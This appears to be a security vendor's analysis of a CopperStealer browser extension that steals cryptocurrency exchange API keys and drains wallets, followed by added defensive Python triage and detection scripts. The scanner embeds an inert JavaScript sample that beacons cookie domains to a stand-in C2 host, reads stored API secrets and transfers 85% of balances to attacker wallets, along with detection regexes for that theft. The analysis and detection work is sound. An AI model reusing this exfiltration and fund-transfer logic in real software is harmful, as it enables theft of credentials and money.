

Update (2:05 AM EST): We have updated the list of IOCs and detections.

We have previously published our analyses of CopperStealer distributing malware by abusing various components such as a browser stealer, an adware browser extension, or remote desktop. Tracking the cybercriminal group's latest activities, we found a malicious browser extension capable of creating and stealing API keys from infected machines when the victim is logged in to a major cryptocurrency exchange website. These API keys allow the extension to perform transactions and send cryptocurrencies from victims' wallets to the attackers' wallets. As with previous routines, this new component is spread via fake crack (also known as warez) websites.

The component is usually distributed in a single dropper together with a browser stealer and bundled with other unrelated pieces of malware. This bundle is compressed into a password-protected archive and has been distributed in the wild since July. The component's first stage uses the same cryptor described in our previous posts; the second stage is the decrypted DLL, which is packed with the Ultimate Packer for eXecutables (UPX). After decrypting and unpacking it, we found a resource directory named CRX containing a 7-Zip archive. Malicious Chrome browser extensions are usually packaged this way.

The extension installer first modifies the files Preferences and Secure Preferences in the Chromium-based browser's User Data directory. Preferences is a JSON file that holds individual user settings; here the installer switches off browser notifications. Secure Preferences is also in JSON format and holds the settings of installed extensions; for the newly installed extension, the content of the crx.json file is inserted into this file. The new extension is also added to the extension installation allow list kept in the registry. The files from the crx.7z archive are then extracted into the extension's directory. Finally, the browser restarts so the newly installed extension becomes active.

The targeted browsers we analyzed are all Chromium-based. After installation, the newly installed extension is visible in chrome://extensions/. We also noted that the extension was installed to victims' browsers under two different extension IDs, neither of which can be found on the official Chrome Web Store.

The extension's scripts are obfuscated in two steps, both of which can be undone with custom automation scripts. Analyzing the deobfuscated scripts, this section breaks down how the cybercriminals steal the account information of legitimate cryptocurrency wallet users.

When the extension starts, the background script makes two queries. The first is a GET request, likely made for statistical purposes. The second is a POST request to /traffic/domain whose data contains the domains of cryptocurrency-related websites, derived from the cookies found on the machine. The extension then defines an array of the threat actor's addresses for various cryptocurrencies and tokens, including Tether (USDT, specifically on Ethereum as ERC20 and on TRON as TRC20). For ETH addresses, the script additionally hardcodes about 170 ERC20-based tokens.

Afterward, the extension registers an onMessage listener for messages sent from either an extension process or a content script. Each message is JSON containing a name-value pair called method, and the background script dispatches on its value. One method tries to obtain the API key (apiKey) and API secret (apiSecret) from Chrome's local storage, if this key-secret pair was previously obtained and saved. These parameters are needed for the following steps: the script uses the exchange API to get information about wallets, addresses, and balances by requesting /api/v2/accounts, and the result of this request is also exfiltrated. If the request is successful, the background script sends an “okApi” message to the content script and starts parsing the wallet information. If a wallet balance is non-zero, it attempts to send 85% of the available funds to the attacker-controlled wallet.

Another flow creates the API keys on the exchange website. After one more authentication code is entered, a form with the newly generated API keys is displayed. If this succeeds, the background script extracts the two keys (API Key and API Secret) from the “API key details” form, saves them to Chromium's local storage for later use, and exfiltrates them. If API authentication is not successful, a “retryApi” message is sent to the content script.
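The installer's changes described above (an extension entry inserted into Secure Preferences and the extension ID added to the registry allow list) leave artifacts a responder can check directly. The Python script below is an added example, not code from the original analysis or from the malware: it parses the extensions.settings section of a Chromium Secure Preferences file and flags extensions that did not come from the Chrome Web Store, cross-referencing an allow list. The Secure Preferences sample and both extension IDs in it are constructed, and the policy key HKLM\SOFTWARE\Policies\Google\Chrome\ExtensionInstallAllowlist is assumed to be the registry allow list the text refers to.

```python
"""Added example: triage Chromium Secure Preferences for sideloaded extensions."""
import json
import re

# Chromium extension IDs are 32 characters drawn from a-p.
EXT_ID_RE = re.compile(r"^[a-p]{32}$")
WEBSTORE_UPDATE_URL = "https://clients2.google.com/service/update2/crx"

# Constructed sample of the extensions.settings section of Secure Preferences.
# Both IDs are made up. The first mimics a Web Store install; the second a
# sideloaded extension: from_webstore is false and there is no Web Store update_url.
SAMPLE_SECURE_PREFS = json.dumps({
    "extensions": {
        "settings": {
            "abcdefghijklmnopabcdefghijklmnop": {
                "from_webstore": True,
                "state": 1,
                "manifest": {
                    "name": "Legit Notes",
                    "version": "2.3.1",
                    "update_url": WEBSTORE_UPDATE_URL,
                    "permissions": ["storage"],
                },
            },
            "ponmlkjihgfedcbaponmlkjihgfedcba": {
                "from_webstore": False,
                "state": 1,
                "manifest": {
                    "name": "Wallet Helper",
                    "version": "1.0",
                    "permissions": ["cookies", "storage", "tabs", "<all_urls>"],
                },
            },
        }
    },
    "protection": {"macs": {}},
})

# Constructed stand-in for the values under the (assumed) policy key
# HKLM\SOFTWARE\Policies\Google\Chrome\ExtensionInstallAllowlist.
SAMPLE_ALLOWLIST_VALUES = {"1": "ponmlkjihgfedcbaponmlkjihgfedcba"}


def load_extension_settings(secure_prefs_text):
    """Return {extension_id: settings} for every well-formed ID in Secure Preferences."""
    prefs = json.loads(secure_prefs_text)
    settings = prefs.get("extensions", {}).get("settings", {})
    return {ext_id: s for ext_id, s in settings.items() if EXT_ID_RE.match(ext_id)}


def classify_extension(ext_id, settings, allowlist_ids):
    """Decide whether one extension looks sideloaded and why."""
    manifest = settings.get("manifest", {})
    update_url = manifest.get("update_url", "")
    from_webstore = bool(settings.get("from_webstore", False))
    reasons = []
    if not from_webstore:
        reasons.append("from_webstore is false")
    if update_url != WEBSTORE_UPDATE_URL:
        reasons.append("no Chrome Web Store update_url")
    if ext_id in allowlist_ids:
        reasons.append("listed in ExtensionInstallAllowlist policy")
    return {
        "id": ext_id,
        "name": manifest.get("name", "<unnamed>"),
        "version": manifest.get("version", "?"),
        "permissions": manifest.get("permissions", []),
        "sideloaded": not from_webstore or update_url != WEBSTORE_UPDATE_URL,
        "in_policy_allowlist": ext_id in allowlist_ids,
        "reasons": reasons,
    }


def triage(secure_prefs_text, allowlist_values):
    """Return findings for every extension that did not come from the Web Store."""
    allowlist_ids = {v for v in allowlist_values.values() if EXT_ID_RE.match(v)}
    findings = []
    for ext_id, settings in load_extension_settings(secure_prefs_text).items():
        info = classify_extension(ext_id, settings, allowlist_ids)
        if info["sideloaded"]:
            findings.append(info)
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_SECURE_PREFS, SAMPLE_ALLOWLIST_VALUES):
        print(f"{f['id']} {f['name']} v{f['version']}: {'; '.join(f['reasons'])}")
        print("  permissions:", ", ".join(f["permissions"]))
```

On a live Windows host, read the Secure Preferences file from the profile's User Data directory and the allow list values with winreg, then pass both to triage(). Developer-mode unpacked extensions and enterprise force-installed extensions also fail the Web Store check, so treat the output as a review list rather than a verdict; an extension that is both absent from the Web Store and present in a policy allow list on an unmanaged machine is the combination worth escalating.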

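The background-script behaviour described above (hardcoded attacker addresses for ERC20 and TRC20, an onMessage dispatcher keyed on method, apiKey/apiSecret kept in local storage, the /api/v2/accounts request, the okApi/retryApi signals, the 85% transfer) can be turned into static indicators for triaging an unpacked extension directory. The Python script below is an added example, not code from the original analysis: it reads manifest.json, locates the declared background and content scripts, and reports wallet-address constants and indicator matches per script. The manifest and background.js it scans are constructed, inert stand-ins written to a temporary directory, and the handler name in them is a placeholder. The text notes the real scripts are obfuscated in two steps, so this scan only gives useful results on the deobfuscated scripts.

```python
"""Added example: static indicator scan of an unpacked Chromium extension."""
import json
import re
import tempfile
from pathlib import Path

# Address formats for the two token families the analysis names.
ETH_RE = re.compile(r"\b0x[0-9a-fA-F]{40}\b")          # Ethereum / ERC20
TRON_RE = re.compile(r"\bT[1-9A-HJ-NP-Za-km-z]{33}\b")  # TRON / TRC20 (base58)

# Behavioural indicators taken from the analysis.
INDICATORS = {
    "onMessage dispatch on a 'method' field": re.compile(r"onMessage[\s\S]{0,200}?\.method\b"),
    "apiKey/apiSecret read from local storage": re.compile(r"storage\.local[\s\S]{0,80}?(apiKey|apiSecret)"),
    "exchange /api/v2/accounts request": re.compile(r"/api/v2/accounts"),
    "cookie-derived /traffic/domain beacon": re.compile(r"/traffic/domain"),
    "okApi/retryApi content-script signalling": re.compile(r"\b(okApi|retryApi)\b"),
    "transfer of 85% of the balance": re.compile(r"\b0\.85\b"),
}

# Constructed manifest and background script: inert stand-ins, not the real
# extension. The "accounts" handler name is a placeholder; content.js is
# deliberately absent to show how missing declared scripts are reported.
SAMPLE_MANIFEST = {
    "manifest_version": 2, "name": "Wallet Helper", "version": "1.0",
    "permissions": ["cookies", "storage", "tabs", "<all_urls>"],
    "background": {"scripts": ["background.js"]},
    "content_scripts": [{"matches": ["<all_urls>"], "js": ["content.js"]}],
}
SAMPLE_BACKGROUND_JS = """
const C2 = "https://c2.invalid";
const EXCHANGE = "https://exchange.invalid";
const WALLETS = {
  ETH: "0xdeadbeefdeadbeefdeadbeefdeadbeefdeadbeef",
  TRC20: "TABCDEFGHJKLMNPQRSTUVWXYZabcdefghi",
};
chrome.cookies.getAll({}, (cookies) => {
  fetch(C2 + "/traffic/domain", { method: "POST", body: JSON.stringify(cookies.map((c) => c.domain)) });
});
const HANDLERS = {
  accounts(msg, reply) {
    chrome.storage.local.get(["apiKey", "apiSecret"], (creds) => {
      fetch(EXCHANGE + "/api/v2/accounts", { headers: sign(creds) })
        .then((r) => r.json())
        .then((wallets) => {
          reply("okApi");
          for (const w of wallets) if (w.balance > 0) transfer(w, w.balance * 0.85, WALLETS);
        })
        .catch(() => reply("retryApi"));
    });
  },
};
chrome.runtime.onMessage.addListener((msg, sender, reply) => {
  const handler = HANDLERS[msg.method];
  if (handler) handler(msg, reply);
  return true;
});
"""


def declared_scripts(manifest):
    """Scripts run in the background context (MV2 and MV3) plus all content scripts."""
    bg = manifest.get("background", {})
    scripts = list(bg.get("scripts", []))
    if "service_worker" in bg:
        scripts.append(bg["service_worker"])
    for cs in manifest.get("content_scripts", []):
        scripts.extend(cs.get("js", []))
    return scripts


def scan_script(js_text):
    """Wallet-address constants and behavioural indicators found in one script."""
    return {
        "eth_addresses": sorted(set(ETH_RE.findall(js_text))),
        "tron_addresses": sorted(set(TRON_RE.findall(js_text))),
        "indicators": [name for name, rx in INDICATORS.items() if rx.search(js_text)],
    }


def scan_extension(ext_dir):
    """Scan every declared script of an unpacked extension directory."""
    ext_dir = Path(ext_dir)
    manifest = json.loads((ext_dir / "manifest.json").read_text(encoding="utf-8"))
    report = {"name": manifest.get("name"), "permissions": manifest.get("permissions", []),
              "scripts": {}, "missing": []}
    for rel in declared_scripts(manifest):
        path = ext_dir / rel
        if path.is_file():
            report["scripts"][rel] = scan_script(path.read_text(encoding="utf-8", errors="replace"))
        else:
            report["missing"].append(rel)  # declared in the manifest but not on disk
    return report


def scan_sample():
    """Write the constructed extension to a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        (Path(tmp) / "manifest.json").write_text(json.dumps(SAMPLE_MANIFEST), encoding="utf-8")
        (Path(tmp) / "background.js").write_text(SAMPLE_BACKGROUND_JS, encoding="utf-8")
        return scan_extension(tmp)


if __name__ == "__main__":
    report = scan_sample()
    print(report["name"], "permissions:", ", ".join(report["permissions"]))
    for rel, hits in report["scripts"].items():
        print(f"{rel}: ETH {hits['eth_addresses']} TRON {hits['tron_addresses']}")
        for name in hits["indicators"]:
            print("  -", name)
    print("missing scripts:", report["missing"])
```

Point scan_extension() at the extension directory the installer populates from crx.7z. Address regexes alone are noisy on legitimate wallet extensions, so weigh them together with the behavioural indicators and the permission set (cookies plus <all_urls> is what the cookie-derived domain beacon needs); any address constants that do match are candidates for the IOC list.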